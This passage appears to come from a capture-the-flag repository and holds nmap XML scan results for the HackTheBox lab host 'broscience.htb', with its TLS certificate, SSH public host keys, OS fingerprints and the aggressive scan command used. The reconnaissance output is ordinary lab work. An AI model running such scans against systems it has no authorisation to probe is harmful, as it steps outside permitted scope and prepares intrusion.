7cB82czIt8aRa&#xa;gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1&#xa;m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY&#xa;BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL&#xa;7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ&#xa;Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG&#xa;BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5&#xa;PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A&#xa;WjAfBgNVHSMEGDAWgBR8vMUiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD&#xa;AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC&#xa;H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK&#xa;atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb&#xa;TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj&#xa;+Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O&#xa;r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6&#xa;QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO&#xa;P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWdwUplaBm&#xa;w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx&#xa;Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK&#xa;bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc&#xa;dfC1SCd82A==&#xa;-&#45;&#45;&#45;&#45;END CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;"><table key="subject">
<elem key="commonName">broscience.htb</elem>
<elem key="countryName">AT</elem>
<elem key="emailAddress">administrator@broscience.htb</elem>
<elem key="localityName">Vienna</elem>
<elem key="organizationName">BroScience</elem>
</table>
<table key="issuer">
<elem key="commonName">broscience.htb</elem>
<elem key="countryName">AT</elem>
<elem key="emailAddress">administrator@broscience.htb</elem>
<elem key="localityName">Vienna</elem>
<elem key="organizationName">BroScience</elem>
</table>
<table key="pubkey">
<elem key="type">rsa</elem>
<elem key="bits">4096</elem>
<elem key="modulus">A7325F613F7BC06AC9153A16828E5A8585268EA72C784A074C0D8263EB714679C9C8B33DCFBA7AB7A8160CD99A3E6A2349415B8659367E66E6705C025571082EAACD3FAF518D4D8FC5720B4B1E87DD002581971F2956389A0497E6BC50EADB8AB6E4BAF24D8701BA12BCA8D9E9D68264A4C871C88C7D9D992DBDBE6C9DC4025A7D3474E084246E6C9F85BB98304979699650092F99B80FB93110966E9660F04D363B9CC05926BA29CDD6D439E310524D10263D7F08A06BCE36B11ED0C5061A24DDF46C14001B40C981ACBA01FFBB701F3673322DF1A45A81CAE4AC2781B5673AB74557C82380A9E552821AB362166E01B19069024DFE581C54BD99932F09B5EEF41065BD2ECAB59BAA3DDA0A0C09F1052B12A2783D27895B4E5B5BFF9A4BB0306ED1E95458F43EB24A7F634CAD169A60585F4575E39A18054F1651B840A9900F6FFBEC6B21A656C29A5FAAEE3543B4B74ED984C8CEF063B5981879D3BFB7611B58CEDC2E78238BEDEDCDE6374E59721AB865D069FA3D8E1BA195EB64B66785B39CAD3398137F45FB47E227936728BA6E5323F2952B65902DBFA848E920A9BAD5A48CABDD8AE9A96D4D9F27A43F07946C2FE7E3FB9266FD7EF501E3189DDA42D5A67FBDC91429060417A2ACDB9F6F8FE299D5FC199A6426CDF991C2F7DA04727E92C717D8321086D6F4D1275F592983C55F0AB5093A34793C579D8D5B70E06FDB</elem>
<elem key="exponent">65537</elem>
</table>
<table key="extensions">
<table>
<elem key="name">X509v3 Subject Key Identifier</elem>
<elem key="value">7C:BC:C5:22:C8:6E:50:5B:21:11:E5:C3:A1:93:6E:2B:68:BF:80:5A</elem>
</table>
<table>
<elem key="name">X509v3 Authority Key Identifier</elem>
<elem key="value">7C:BC:C5:22:C8:6E:50:5B:21:11:E5:C3:A1:93:6E:2B:68:BF:80:5A</elem>
</table>
<table>
<elem key="name">X509v3 Basic Constraints</elem>
<elem key="value">CA:TRUE</elem>
<elem key="critical">true</elem>
</table>
</table>
<elem key="sig_algo">sha256WithRSAEncryption</elem>
<table key="validity">
<elem key="notBefore">2022-07-14T19:48:36</elem>
<elem key="notAfter">2023-07-14T19:48:36</elem>
</table>
<elem key="md5">5328ddd62f3429d11d26ae8a68d86e0c</elem>
<elem key="sha1">20568d0d9e4109cde5a22021fe3f349c40d8d75b</elem>
<elem key="pem">-&#45;&#45;&#45;&#45;BEGIN CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL&#xa;BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv&#xa;U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW&#xa;HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN&#xa;MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw&#xa;EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG&#xa;CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ&#xa;KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK&#xa;B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N&#xa;j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d&#xa;mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6&#xa;Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa&#xa;gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1&#xa;m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY&#xa;BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL&#xa;7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ&#xa;Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG&#xa;BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5&#xa;PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A&#xa;WjAfBgNVHSMEGDAWgBR8vMUiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD&#xa;AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC&#xa;H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK&#xa;atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb&#xa;TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj&#xa;+Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O&#xa;r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6&#xa;QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO&#xa;P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWdwUplaBm&#xa;w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx&#xa;Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK&#xa;bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc&#xa;dfC1SCd82A==&#xa;-&#45;&#45;&#45;&#45;END CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;</elem>
</script><script id="http-server-header" output="Apache/2.4.54 (Debian)"><elem>Apache/2.4.54 (Debian)</elem>
</script><script id="tls-alpn" output="&#xa; http/1.1"><elem>http/1.1</elem>
</script><script id="ssl-date" output="TLS randomness does not represent time"></script></port>
</ports>
<os><portused state="open" proto="tcp" portid="22"/>
<portused state="closed" proto="tcp" portid="1"/>
<osmatch name="Linux 4.15 - 5.6" accuracy="94" line="67238">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="4.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:4</cpe></osclass>
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.3 - 5.4" accuracy="94" line="68140">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 2.6.32" accuracy="93" line="55653">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.1" accuracy="93" line="62917">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:3.1</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.2" accuracy="93" line="64664">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:3.2</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0 - 5.3" accuracy="92" line="68082">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="AXIS 210A or 211 Network Camera (Linux 2.6.17)" accuracy="92" line="61815">
<osclass type="webcam" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:2.6.17</cpe></osclass>
<osclass type="webcam" vendor="AXIS" osfamily="embedded" accuracy="92"><cpe>cpe:/h:axis:210a_network_camera</cpe><cpe>cpe:/h:axis:211_network_camera</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0" accuracy="91" line="68042">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="91"><cpe>cpe:/o:linux:linux_kernel:5.0</cpe></osclass>
</osmatch>
<osmatch name="Crestron XPanel control system" accuracy="91" line="19543">
<osclass type="specialized" vendor="Crestron" osfamily="2-Series" accuracy="91"><cpe>cpe:/o:crestron:2_series</cpe></osclass>
</osmatch>
<osmatch name="Adtran 424RG FTTH gateway" accuracy="90" line="1576">
<osclass type="specialized" vendor="Adtran" osfamily="embedded" accuracy="90"><cpe>cpe:/h:adtran:424rg</cpe></osclass>
</osmatch>
<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=2/1%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63DA9861%P=x86_64-pc-linux-gnu)&#xa;SEQ(SP=105%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)&#xa;OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)&#xa;WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)&#xa;ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)&#xa;T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)&#xa;T2(R=N)&#xa;T3(R=N)&#xa;T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;U1(R=N)&#xa;IE(R=Y%DFI=N%TG=40%CD=S)&#xa;"/>
</os>
<uptime seconds="2473029" lastboot="Wed Jan 4 02:53:32 2023"/>
<distance value="2"/>
<tcpsequence index="261" difficulty="Good luck!" values="AD3A7DAF,7569CE33,8F8AAE03,87127FB0,73479EFC,DD0F05B5"/>
<ipidsequence class="All zeros" values="0,0,0,0,0,0"/>
<tcptssequence class="1000HZ" values="9366DC66,9366DCCD,9366DD32,9366DD99,9366DDFE,9366DE62"/>
<trace port="5900" proto="tcp">
<hop ttl="1" ipaddr="10.10.16.1" rtt="25.54"/>
<hop ttl="2" ipaddr="10.10.11.195" rtt="57.25" host="broscience.htb"/>
</trace>
<times srtt="40113" rttvar="17235" to="109053"/>
</host>
<taskbegin task="NSE" time="1675270241"/>
<taskend task="NSE" time="1675270241"/>
<taskbegin task="NSE" time="1675270241"/>
<taskend task="NSE" time="1675270241"/>
<taskbegin task="NSE" time="1675270241"/>
<taskend task="NSE" time="1675270241"/>
<runstats><finished time="1675270241" timestr="Wed Feb 1 17:50:41 2023" summary="Nmap done at Wed Feb 1 17:50:41 2023; 1 IP address (1 host up) scanned in 62.65 seconds" elapsed="62.65" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

180
HTB/broscience/results/scans/xml/_quick_tcp_nmap.xml Normal file
View File

@@ -0,0 +1,180 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Wed Feb 1 17:49:39 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/broscience/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.195 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/broscience/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.195" start="1675270179" startstr="Wed Feb 1 17:49:39 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="SYN Stealth Scan" time="1675270179"/>
<taskend task="SYN Stealth Scan" time="1675270180" extrainfo="1000 total ports"/>
<taskbegin task="Service scan" time="1675270180"/>
<taskend task="Service scan" time="1675270192" extrainfo="3 services on 1 host"/>
<taskbegin task="Traceroute" time="1675270196"/>
<taskend task="Traceroute" time="1675270196"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1675270196"/>
<taskend task="Parallel DNS resolution of 1 host." time="1675270207"/>
<taskbegin task="NSE" time="1675270207"/>
<taskend task="NSE" time="1675270212"/>
<taskbegin task="NSE" time="1675270212"/>
<taskend task="NSE" time="1675270213"/>
<taskbegin task="NSE" time="1675270213"/>
<taskend task="NSE" time="1675270213"/>
<host starttime="1675270179" endtime="1675270213"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.195" addrtype="ipv4"/>
<hostnames>
<hostname name="broscience.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="997">
<extrareasons reason="reset" count="997" proto="tcp" ports="1,3-4,6-7,9,13,17,19-21,23-26,30,32-33,37,42-43,49,53,70,79,81-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,444-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.4p1 Debian 5+deb11u1" extrainfo="protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.4p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDB5dEat1MGh3CDDnkl4tdWQcTpdWZYHZj5/Orv3PDjSiQ4dg1i35kknwiZrXLiMsUu/4TigP9Kc3h4M1CS7E3/GprpWxuGmipEucoQuNEtaM0sUa8xobtFxOVF46kS0++ozTd4+zbSLsu73SlLcSuSFalhGnHteHj6/ksSeX642103SMqkkmEu/cbgofkoqQOCYk3Qa42bZq5bjS/auGAlPoAxTjjVtpHnXOKOU7M6gkewD91FB3GAMUdwqR/PJcA5xqGFZm2St9ecSbewCur6pLN5YKnNhvdID4ijWI22gu5pLxHL9XjORMbSUkJbB79VoYJZaNkdOgt+HXR67s9DWI47D6/+pO0dTfQgMFgOCxYheWMDQ2FuyHyGX1CZpMVLAo3sjOvxAqk7eUGutsyBAlYCD4lhSFs6RhSBynahHQah7+Lv5LKRriZe/fQIgrJrQj+tR4Uhz89eWGrXK9bjN22wy7tVkMG/w5dOwo7S3Wi0aTZfd/17D0z7wSdiAiE=&#xa; 256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=&#xa; 256 3c6575274ae2ef9391374cfdd9d46341 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN"><table>
<elem key="type">ssh-rsa</elem>
<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQDB5dEat1MGh3CDDnkl4tdWQcTpdWZYHZj5/Orv3PDjSiQ4dg1i35kknwiZrXLiMsUu/4TigP9Kc3h4M1CS7E3/GprpWxuGmipEucoQuNEtaM0sUa8xobtFxOVF46kS0++ozTd4+zbSLsu73SlLcSuSFalhGnHteHj6/ksSeX642103SMqkkmEu/cbgofkoqQOCYk3Qa42bZq5bjS/auGAlPoAxTjjVtpHnXOKOU7M6gkewD91FB3GAMUdwqR/PJcA5xqGFZm2St9ecSbewCur6pLN5YKnNhvdID4ijWI22gu5pLxHL9XjORMbSUkJbB79VoYJZaNkdOgt+HXR67s9DWI47D6/+pO0dTfQgMFgOCxYheWMDQ2FuyHyGX1CZpMVLAo3sjOvxAqk7eUGutsyBAlYCD4lhSFs6RhSBynahHQah7+Lv5LKRriZe/fQIgrJrQj+tR4Uhz89eWGrXK9bjN22wy7tVkMG/w5dOwo7S3Wi0aTZfd/17D0z7wSdiAiE=</elem>
<elem key="bits">3072</elem>
<elem key="fingerprint">df17c6bab18222d91db5ebff5d3d2cb7</elem>
</table>
<table>
<elem key="type">ecdsa-sha2-nistp256</elem>
